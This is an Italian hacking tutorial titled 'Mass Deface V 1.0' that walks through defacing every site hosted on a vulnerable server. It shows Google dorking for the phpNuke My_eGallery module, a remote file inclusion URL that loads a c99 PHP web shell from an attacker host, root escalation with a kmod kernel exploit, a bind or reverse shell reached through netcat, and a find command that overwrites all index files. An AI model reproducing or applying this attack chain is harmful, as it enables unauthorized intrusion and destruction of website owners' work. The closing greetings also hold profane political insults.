Menu principale:
Hå¢kÎñG > ÐêFå¢ìÑg
Mass Deface V 1.0 by Zapata Vive!!! aka KingOfSka
http://www.cpc.info.ms
http://www.contropoterecrew.info.ms
Prima di
tutto imparate e convincetevi di 1 cosa: non e’ come nei film che arriva uno,
pigia una serie di tasti a cazzo sulla tastiera ed ha accesso ai pc dell NSA o
ti fa esplodere il pc…
Detto cio’,in questa guida spieghero’ nella maniera piu’ breve e semplice
possibile come fare un bel mass deface su un server, tenete presente che non si
puo’ fare SEMPRE , ma solo sui server vulnerabili di cui si parlerà piu’
avanti.
1.1 — Cosa Dovete Sapere:
Conoscenza
base di Linux
Comandi Generici delle Shell Linux
Conoscienza base di PHP
Conoscienza Base di Html
Come compilare un programma c per Linux
Se non sapete fare queste cose, esiste google, con tanti manuali, guide. e tutorial, non chiedetemi cose del tipo “compili l’exploit per me e me lo invii?”…
1.2 — Cosa Dovete Avere:
Un pc con
connessione internet lol
Una buona lista di proxy
Tanto tempo da perdere dietro al pc
2.0 — Si inizia
La
tecninca che vi spieghero’ consiste in 4 punti:
1: Trovare un sito web vulnerabile
1.1: Il Bug Wink
2: La shell in PHP
2.2: Entriamo in Azione Wink
3: Ottenere i privilegi di root
4: Sovrascrivere tutti gli index di tutti i siti ospitati in un unico server
2.0 — Remote File Inclusion e phpNuke:
Ci sono
tanti tipi di vulnerabilità , quella che serve a noi ora e’ il Remote File
Inclusion. Che e’ ? Semplice, consiste nel far eseguire ad un server uno script
PHP hostato su un altro server.
Come esempio useremo un bug del modulo My_eGallery di phpNuke, per trovare i
siti vulnerabili c’e’ il nostro miglior amico dopo il Pinguino, Google.
Fate una semplice ricerca con “allinurl:my_eGallery” come parola chiave, e
vedrete tutti i siti indicizzati da google che usano questo modulo.
2.1 — Il Bug
Il bug che sfrutteremo risiede nelle versioni del modulo My_eGallery precedenti alla 3.1.1 g.
http://www.vittima.it/modules/My_eGallery/public/displayCategory.php?basepath=http://sitocattivo.com/shell.jpg
Che
significa ? inviando un URL come questo dal nostro browser faremo eseguire lo
script shell.jpg , che e’ in un altro host (http://sitocattivo.com) , sul server
vittima.
Ma se volevamo una shell in PHP perche’ e’ .jpg ???
Se fosse shell.php , lo script verrebbe interpretato sul server che lo hosta, e
noi invece vogliamo che sia interpretato (eseguito…) sul server vittima.
2.2 — La Shell in PHP:
Cos’e’ una
shell spero lo sappiate, la cosa bella e’ che si possono creare degli script in
php che ci permettono di eseguiri comandi da remoto, attraverso il nostro
browser web (IE sucks ! Firefox Rulez : www.getfirefox.com) come se avessimo
accesso diretto al server.La migliore shell in PHP , a mio avviso e’ la c99
shell del Captain Crunch Team,
ha un sacco di opzioni, e pure il tasto “Mass Deface” per i piu’ imbranati…
Quindi recuperatela, se non sapete dove trovarla (Google Rulez) guardate in
fondo alla pagina nella sezione link…
2.3 —
Incominciamo sul serio
Supponiamo che abbiate scoperto con google che il sito vittima.it abbia
installato my_eGallery , e che la vostra shell sia su sitocattivo.com/shell,jpg
Con il nostro browser . ben proxati, colleghiamoci all’url:
http://www.vittima.it/modules/My_eGallery/public/displayCategory.php?basepath=http://sitocattivo.com/shell.jpg
Se vi beccate un messaggio tipo “Were you trying to hack our site or server ???
Go
Away Bastard” evidentemente non si puo’ fare niente…
Se al contrario vediamo la rassicurante scritta “! c99 Shell !” allora possiamo
essere un po’ contenti Wink
Nella parte alta della shell, vedrete un bel po’ di informazioni sul pc che
funge da server, come OS , ip , versione del web server e altro..
———————————————————————————-
Software: Apache/1.3.6 (Unix) (Red Hat/Linux) PHP/4.3.1
uname -a: Linux sito.host.it 2.2.5-15 #1 Mon Apr 19 23:00:46 EDT 1999 i686
uid=99(nobody) gid=99(nobody) groups=99(nobody)
Safe-mode: OFF (not secure)
Directory: /www/sito.com/ rwxrwxrwx
Free 2.83 GB of 13.27 GB (21.3%)
—————————————————————————————
Queste
informazioni, si ottengono sui server Linux con il comando “uname -a” ,
se vedete che non siamo su un server Linux per ora lasciamo stare…
Tra queste info, vedrete la versione del Kernel, il “cuore” di linux, che pero’
, purtroppo e per fortuna e’ pieno di bug che ci permetteranno , da user
pezzente (nobody) senza privilegi, di diventare root , ovvero il dio del sistema
Wink
Per questo esempio porremo che il server abbia come SO Linux con kernel
2.2.5-15.
Ora ci faremo un giretto nel server…
Continuate a risalire le directory, finche’ , se tutto va bene, arriverete alla
cartella /www/ , contente una serie di sottocartelle , con ciascuna il nome di
un sito internet.
Per evitare che in maniera così semplice si possano defacciare tutti i siti
ospitati e avere il completo controllo del server, esistono i diversi user,
ciascuno con i loro privilegi, Noi ora siamo “nobody” (potete controllare con il
comando “whoami”) , e abbiamo accesso solo alle cartelle con chmod 777 , ovvero
quelle scrivibili da tutti, in generale sono cartelle settate in questo modo per
permettere l’upload i immagini o file.
Cerchiamo una cartella nella quale abbiamo pieno accesso, nella C99 sono
evidenziate in verde.
3 — Roooooooooooooooooooooooot
E come
facciamo a diventare root ??
Exploitiamo il kernel Wink
L’exploit che ci serve e’ quello del “kmod” , si trova anche troppo facilmente
da google, scarichiamolo, uppiamolo sul server con la funzione upload della C99,
e compiliamolo, gcc kmod.c - kmod ….
Chmoddiamolo a 777 per ottenere il permesso di eseguirlo e siamo a posto Wink
Ora usiamo la funzione “bind” di C99 , che ci crea una shell sul server a cui
possiamo accedere da remoto con Netcat o Telnet.
Settiamola sulla porta che preferiamo , e facciamo bind, se il server non e’
protetto da firewall dovrebbe essere a posto, se no provate la reverse shell
altrimenti si parlerà piu’ avanti di come fregare sti firewall Smile
Connettiamo alla nostra shell, e facciamo un “id” come risposta dovremmo
ottenere:
——————————————————–
uid=99(nobody) gid=99(nobody) groups=99(nobody)
——————————————————–
che ci
conferma l’inutilità del nostro user…
Ora eseguiamo l’exploit con ./kmod , rifacciamo “id” e se tutto va come
previsto:
—————————————————————————————-
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
—————————————————————————————-
ed ora possiamo tutto Wink
4 — Ed ora la parte cattiva…
E quì
si differenziano le persone, c’e’ chi sovrascrive tutti gli index.html e
defaccia le home, chi cerca un file inutile e lo sovrascrive per segnalare la
sua presenza senza fare danni, e chi lascia semplicemente un file in /root per
avvisare l’admin…
visto che creare un file in /root e scriverci dentro, penso lo sappiate fare (o
almeno spero…) vediamo come defacciare le home Wink
In questo caso ci torna comodo il comando “find” di Linux:
———————————————————
find / -name “index.*” -exec cp nostroindex.html {} \;
———————————————————
Che fa
questo comando ?? dice al nostro pinguino di cercare tutti i file “index.html” ,
quindi .php, .shtml, .e così via a partire dalla directory / e in tutte le
sue subdirectory, quando lo ha trovato, lo sovrascrive con il nostro file
“nostroindex.html” che deve essere nella stessa directory dalla quale eseguiamo
il comando.
Finito! Siete contenti ? Siete riusciti in poco tempo a fare un bel casino,
personalmente non mi piace defacciare le home, piuttosto che sentirmi 50
webmaster tirarmi addosso i cristoni per aver rovinato il loro lavoro,
preferisco lasciare un messaggio e sentire poi i webmaster stessi che
ringraziano per aver evitato loro guai peggiori.. Per maggiori info visitate il
sito o mandatemi una mail, non fate troppi danni…
Link:
http://www.zone-h.com => database mondiale
dei defacements
http://www.cpc.info.ms => Il sito della
Contro Potere Crew, fateci un salto se vi serve materiale tipo le shell o gli
exploit Wink
http://www.google.com => Il vostro migliore
amico dopo il pinguino
Thanks to:
Defacers
Messico
Hackzatan ( NeoSecurity Team )
Waraxe
erg0t (säurE)
La Ganja e il Fumello per i bei momenti di riflessione Wink
La Franziskaner per i litri che scorrono i sabato sera Wink
Il Golden Virgina , non fumate sigarette, meglio il tabacco!!!
Sub. Comandante Insurgente Marcos , dell ‘EZLN e per tutta la gente che ogni
giorno lotta e muore per un mondo migliore.
Banda Bassotti, Sud Sound Sytem, Jaka, Los Fastidios, Merdonalds, Klasse
Kriminale, 99 Posse, e tutti quelli che fanno buona musica Wink
Fuckz to:
La polizia
che abusa del suo potere e fa applicare leggi ingiuste
Bush ! grandissimo uomo che come dicono gli Al Mukawama “sta sempre sconvolto ad
alcool e cocaina quando prende le sue decisioni”
Fini e la sua legge di merda contro le droghe !! Erba Libera !!
Berlusconi e tutto il suo governo di ladri
La Moratti e la sua riforma del cazzo
Forza Nuova , Fascismo e Libertà , e tutte queste di cazzo che ogni mese
picchiano, accoltellano, fanno agguati ai compagni, tornate nelle fogne !!!
Hacker Journal: che rivista… parlano molto ma non combinano nulla, personalmente
la compravo moooooolto tempo fa, non ho mai imparato nulla….